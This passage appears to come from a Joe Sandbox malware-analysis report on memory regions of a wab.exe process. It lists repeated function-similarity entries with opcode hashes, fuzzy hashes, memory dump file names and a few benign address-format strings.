                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                            • Instruction ID: f4e27085447fd9585a2c15b3fe18f29e1ede9806b0aa325eeb8e989557c9b027
                            • Opcode Fuzzy Hash: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                            • Instruction Fuzzy Hash: 10F0E533A1471467C230AE0D8C15F5BBBACDBE5B70F14436ABA249B2D0DA70D911D7DA
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 78b3151bc8400a1355e9b4d1b52940b13f3acf01ade64c7ef4eb715bcb45f1dd
                            • Instruction ID: ef587f3494eb4baa1631920c1011ec40a52ac962b5fb231fe58dd4ec74dfb0e6
                            • Opcode Fuzzy Hash: 78b3151bc8400a1355e9b4d1b52940b13f3acf01ade64c7ef4eb715bcb45f1dd
                            • Instruction Fuzzy Hash: C0F0EC71A10348ABDB04DFF8C95AE8E77B8EF18700F4100A8E205EB280EA74D9009719
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                            • Instruction ID: 597e7ae654ce9cb1c87ef3fdd5cffe9d21bf2f8373b9b1bd544b8cc1858cecab
                            • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                            • Instruction Fuzzy Hash: 8FF0E539704351DBD715CF19D050A857BA8EF46350F0400F4E8468B311D731E981CB85
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                            • Instruction ID: 82704563ff6aeb5c5aea518b3fca2524bf19dab635d0b1e772857ec27a69f4d7
                            • Opcode Fuzzy Hash: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                            • Instruction Fuzzy Hash: A8E06D72610250AFE765DB58DE01FA673ECEB14760F1402A8B225D70D0DAB0EE40CA64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                            • Instruction ID: fa3b5b35d95fc14799aa41a9dd27e4ae006c84878a7bd609e31a41e2192c73e1
                            • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                            • Instruction Fuzzy Hash: E1E0AE343002058BD705DF19C040B6277B6FFE5A10F68C0B8A9488F205EB32A8428A44
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                            • Instruction ID: 67b97c24595964b72be1f3434c5759e9208a74930b82d985a8219448520c33cb
                            • Opcode Fuzzy Hash: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                            • Instruction Fuzzy Hash: D7E0CD31244714B7DB22DE44CC00F557B55DB547D1F504071FB0C5A650C671DD51D6D4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2348b41419db7656cbbbd139e8624bdcbbec737ad51a0925d834fc7e38317610
                            • Instruction ID: 8bb3b6a399847e21e0b854a56073859aafe7ed615b75de564899435ce0e899a3
                            • Opcode Fuzzy Hash: 2348b41419db7656cbbbd139e8624bdcbbec737ad51a0925d834fc7e38317610
                            • Instruction Fuzzy Hash: E8900221211C0443D600B9684C94B47000647D0303F55C165A4158519CC92589615521
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 38dfa4895ee8310975a5976e0a2e78a1b48010ab923893eb534c20be46ea628d
                            • Instruction ID: ad5936dcd8101c111b0fa2e7b49f6e392de69f2e47a40727b3c40b8131c1be6c
                            • Opcode Fuzzy Hash: 38dfa4895ee8310975a5976e0a2e78a1b48010ab923893eb534c20be46ea628d
                            • Instruction Fuzzy Hash: 3290026134140843D500B5584494B46000687E1301F55C065E5068519D8629CD526126
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9fe4039aea401c6f1e1d60b654902dd7b25b5a99469f43244902b7db93dc366e
                            • Instruction ID: fdae3e57f0be6c93b81385244b8a996942c5180bfabe79e49034bbcfdf3747ef
                            • Opcode Fuzzy Hash: 9fe4039aea401c6f1e1d60b654902dd7b25b5a99469f43244902b7db93dc366e
                            • Instruction Fuzzy Hash: 6090026121140443D504B5584484746004647E1301F55C062A6158519CC5398D615125
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 10b6e9d12827415eafe2aa2be70e286daa13a546c884413379d84c075210b43c
                            • Instruction ID: 849506ba2f7dce3ee3e1b5d105f38484e666cd1d326ec43c900b35312fb9a2e1
                            • Opcode Fuzzy Hash: 10b6e9d12827415eafe2aa2be70e286daa13a546c884413379d84c075210b43c
                            • Instruction Fuzzy Hash: 9490027120140803D540B5584484786000647D0301F55C061A9068519E86698ED56665
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ce5daaf0029466d7b1a1dc0e41168220947de494bc5c7527d086b01685adf168
                            • Instruction ID: ff5f572ebdf8a1e807608db9372cfe3e01b695d074311d193018be08cd256489
                            • Opcode Fuzzy Hash: ce5daaf0029466d7b1a1dc0e41168220947de494bc5c7527d086b01685adf168
                            • Instruction Fuzzy Hash: 6490022160140903D501B5584484656000B47D0341F95C072A502851AECA358A92A131
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3194e56dc567f7019ffc94613033eba1e4578f9b61fd6792b2653b22169623e1
                            • Instruction ID: 181608d294964ec86e1049b0d128fbc72856f7901267c460865e6c881a536cfd
                            • Opcode Fuzzy Hash: 3194e56dc567f7019ffc94613033eba1e4578f9b61fd6792b2653b22169623e1
                            • Instruction Fuzzy Hash: 4C90026120180803D540B9584884647000647D0302F55C061A606851AE8A398D516135
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8c0b4c8222dcf70a7e7b783afd24ccb3fe76257b1d2f9f4f19214cd7ab7fceb8
                            • Instruction ID: ef544f38115cc3d36f37eb57e8aafe45c15efa1da8cbd0957afdd39b16145016
                            • Opcode Fuzzy Hash: 8c0b4c8222dcf70a7e7b783afd24ccb3fe76257b1d2f9f4f19214cd7ab7fceb8
                            • Instruction Fuzzy Hash: 6E90022130140803D502B5584494646000A87D1345F95C062E542851AD86358A53A132
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f97e8f17e7fc70e1a976d09a05ce96421023d1adf366ea4636892dd91afce2eb
                            • Instruction ID: 0de5b7623af7c87b1587af80b226784a6f1080da84d5e7e7da917db71579c557
                            • Opcode Fuzzy Hash: f97e8f17e7fc70e1a976d09a05ce96421023d1adf366ea4636892dd91afce2eb
                            • Instruction Fuzzy Hash: 7C90023124140803D541B5584484646000A57D0341F95C062A4428519E86658B56AA61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 78f1d4961016652ef96e4855252c8be29c62e3212853fe98955fc00b6fa5cca7
                            • Instruction ID: 34d950f48a582ef3054d3256131b758197fa29a5faf38f428b95d5668ba89238
                            • Opcode Fuzzy Hash: 78f1d4961016652ef96e4855252c8be29c62e3212853fe98955fc00b6fa5cca7
                            • Instruction Fuzzy Hash: 8F900221242445535945F5584484547400757E0341795C062A5418915C85369956D621
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cee616acf05e366d7ee6355d54822846d084050ca24e3d05c256d2fca941ea50
                            • Instruction ID: 7974888fbcbe90f7232cf0bcbea0edba95a12ced06ba51ed731f1d6532a57b12
                            • Opcode Fuzzy Hash: cee616acf05e366d7ee6355d54822846d084050ca24e3d05c256d2fca941ea50
                            • Instruction Fuzzy Hash: FB90022130140403D540B5585498646400697E1301F55D061E4418519CD92589565222
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 08359e9f0994c502db469b3950ea449bd4a2ce9b83148e83b5d07e8735a01cc2
                            • Instruction ID: 967da89a4ea967e3074ec81dae2c2dc2a2be401c8f130d2923b660d9735bba2d
                            • Opcode Fuzzy Hash: 08359e9f0994c502db469b3950ea449bd4a2ce9b83148e83b5d07e8735a01cc2
                            • Instruction Fuzzy Hash: 59900231202405439940B6585884A8E410647E1302B95D465A4019519CC92489615221
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 512212dcb706980358a9b03a140532ffecb2f5499bab188dcbdaf27f31cad756
                            • Instruction ID: ad151ac9a24bb91f8b49480d7676f498ec9985153e5daeb019f73a4ec8718f61
                            • Opcode Fuzzy Hash: 512212dcb706980358a9b03a140532ffecb2f5499bab188dcbdaf27f31cad756
                            • Instruction Fuzzy Hash: 5890022921340403D580B558548864A000647D1302F95D465A401951DCC92589695321
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2e4f23ad3f85ab23fa2f0ef3975bf1f7824cf70ad74393118f5980f0e75a3fd2
                            • Instruction ID: 930e49a9c58ded0a9a01d7a62d4fc2edaa928e41f985af7eb4e0d5c24e4fa4fe
                            • Opcode Fuzzy Hash: 2e4f23ad3f85ab23fa2f0ef3975bf1f7824cf70ad74393118f5980f0e75a3fd2
                            • Instruction Fuzzy Hash: 5390022120544843D500B9585488A46000647D0305F55D061A506855ADC6358951A131
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 42431c81ab41ea7db1df5c5a5460724a229758fe3f55d255c7bf840f12747264
                            • Instruction ID: 578cd61ff26b297932fa68bbf929f4574f756b81869aae83a582700328475d4b
                            • Opcode Fuzzy Hash: 42431c81ab41ea7db1df5c5a5460724a229758fe3f55d255c7bf840f12747264
                            • Instruction Fuzzy Hash: 8390023520140803D910B5585884686004747D0301F55D461A442851DD866489A1A121
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2093470166834c7edbfd15dbec573cb56bdf7d5383d28be1686e3d57399de6c8
                            • Instruction ID: 799c06da35751fd896c5b3e2f6392171f76c6dbdbc5abe79c9b15cad520c4149
                            • Opcode Fuzzy Hash: 2093470166834c7edbfd15dbec573cb56bdf7d5383d28be1686e3d57399de6c8
                            • Instruction Fuzzy Hash: 4490023120140803D500B9985488686000647E0301F55D061A902851AEC67589916131
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2928b1ab8fdd02b9e83ea0e1cc2c6428b186dd8899e278473be8040b4a149876
                            • Instruction ID: eacaa224bc546ac8e73d75e5c1e4f837a2d945e8acbb42c83966e6f4817a4631
                            • Opcode Fuzzy Hash: 2928b1ab8fdd02b9e83ea0e1cc2c6428b186dd8899e278473be8040b4a149876
                            • Instruction Fuzzy Hash: 6190023120140803D500B5585588747000647D0301F55D461A442851DDD66689516121
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a6642f6b212fbd7444b477beb4386b62911010a40828cbf8242430f8834602f5
                            • Instruction ID: 94efb33b238d1ea39c422cf6578f4e36b1e0b0f4fd415b47f0c248bb6c67689c
                            • Opcode Fuzzy Hash: a6642f6b212fbd7444b477beb4386b62911010a40828cbf8242430f8834602f5
                            • Instruction Fuzzy Hash: E990022160540803D540B5585498746001647D0301F55D061A4028519DC6698B5566A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3bef46cc1b74dfe0c6beacbbe292d00ecab63242d223f95c23e9508bb1090585
                            • Instruction ID: 094a57bf8e2cd7afe7bcf390113ca1fc0c2967d90a2126ea81b5b029bba0a332
                            • Opcode Fuzzy Hash: 3bef46cc1b74dfe0c6beacbbe292d00ecab63242d223f95c23e9508bb1090585
                            • Instruction Fuzzy Hash: CF90023120140C43D500B5584484B86000647E0301F55C066A4128619D8625C9517521
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                            • Instruction ID: 4cfa98345832c42c204c398e9d7e1be2709e26070cdf714aa797b8848e214330
                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                            • Instruction Fuzzy Hash:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph: first node 693 (23b72890-23b728b3)
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                            • API String ID: 48624451-2108815105
                            • Opcode ID: 0241e9e64cd2a546afbd8cd22fb446b8af7adcbfb68378c6f37809cb579a7ea8
                            • Instruction ID: df08d3d5a43f158a98197d9f8aa124db5446b22c0c47758e978ba1f686e5fcfd
                            • Opcode Fuzzy Hash: 0241e9e64cd2a546afbd8cd22fb446b8af7adcbfb68378c6f37809cb579a7ea8
                            • Instruction Fuzzy Hash: 8151B7B6E14556BFCB10DF98889097EFBB8FB49240B1482F9E4B8D7641D234DF408BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            Strings
                            • Execute=1, xrefs: 23BA4713
